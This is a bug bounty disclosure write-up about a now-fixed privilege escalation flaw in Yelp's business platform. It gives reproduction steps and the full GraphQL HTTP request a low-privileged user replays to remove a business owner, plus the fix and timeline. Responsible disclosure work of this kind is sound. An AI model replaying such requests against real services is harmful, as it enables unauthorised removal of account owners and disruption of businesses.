.webp)
About the Author
Vijaysimha Reddy is a Security Engineering Manager at AppSecure and a security researcher specializing in web application security and bug bounty hunting. He is recognized as a Top 10 Bug bounty hunter on Yelp, BigCommerce, Coda, and Zuora, having reported multiple critical vulnerabilities to leading tech companies. Vijay actively contributes to the security community through in-depth technical write-ups and research on API security and access control flaws.
Overview
This post details a privilege escalation vulnerability discovered in Yelp’s business platform, which allowed a low-privileged user to bypass access controls and remove business owners from their own accounts. The issue stemmed from improper permission enforcement in a GraphQL API operation, creating a critical security risk.
The vulnerability could lead to unauthorized removal of business owners, potentially disrupting business operations and compromising account ownership. This post provides a technical breakdown of the flaw, steps to reproduce it, and how Yelp resolved the issue.
About Yelp Business Application:
Yelp Business is a comprehensive platform designed for business owners to manage their online presence on Yelp. It provides tools for businesses to update their information, respond to reviews, track customer engagement, and manage their business profile. Yelp Business web application has an option to invite other users to manage the business page. The newly invited users will have access to every functionality except the User Management page.
Vulnerability Description - Privilege Escalation
This vulnerability represents a security flaw in the access control mechanism of Yelp's business platform. The issue stems from insufficient permission checks at the GraphQL API level, where the application fails to properly validate user permissions when executing the RemoveBizUserFromOrg operation.
Despite the user interface correctly restricting access to the User Management module for low-privileged users, the underlying API endpoint remains accessible and functional, creating a privilege escalation path that could delete the remove the owner from the business account.
Steps to reproduce:
- Go to https://biz.yelp.com and log in to the low privilege user account(Attacker).
- Go to the account settings page. It can be observed that all the modules are accessible except the 'User Management' tab.
.webp)
- Capture any authenticated request from the low privilege user and copy the cookies.
- Replay the ‘RemoveBizUserFromOrg’ GraphQL operation using the low privilege user cookies, user ID of the business owner and business ID. The application will remove the owner of the business account using the low privilege user's cookies without any error.
.webp)
Vulnerable request:
POST /gql/batch HTTP/2
Host: biz.yelp.com
Cookie: redacted
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Apollo-Operation-Name: RemoveBizUserFromOrg
Content-Length: 248
Origin: https://biz.yelp.com
Referer: https://biz.yelp.com/settings/user_management?userType=managedBizUsers&organizationId=ZqPIaCI91rhO55TOuPFWWA
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
[{"operationName":"RemoveBizUserFromOrg","variables":{"orgId":"ZqPIaCI91rhO55TOuPFWWA","bizUserId":"Jc0JNLG1EHMMeXO0000000"},"extensions":{"operationType":"mutation","documentId":"e754e519c255dc44281473c8b5f33869da51b03bb232eeb21cb42a1fc960c178"}}]
Yelp team had fixed the vulnerability by adding server-side permission checks on the vulnerable API. The API now responds with ‘Biz user is not a pseudo admin’ error message if the low privilege user tries to remove other users.
Reference:
https://hackerone.com/reports/2396571
Timeline:
- Report Submission: February 29th 2024
- Triaged: March 12th 2024
- Fix Deployed: April 17th 2024
- Bounty Awarded: 1250 USD on June 11th, 2024
.png)
.webp)
.webp)
.webp)
.webp)
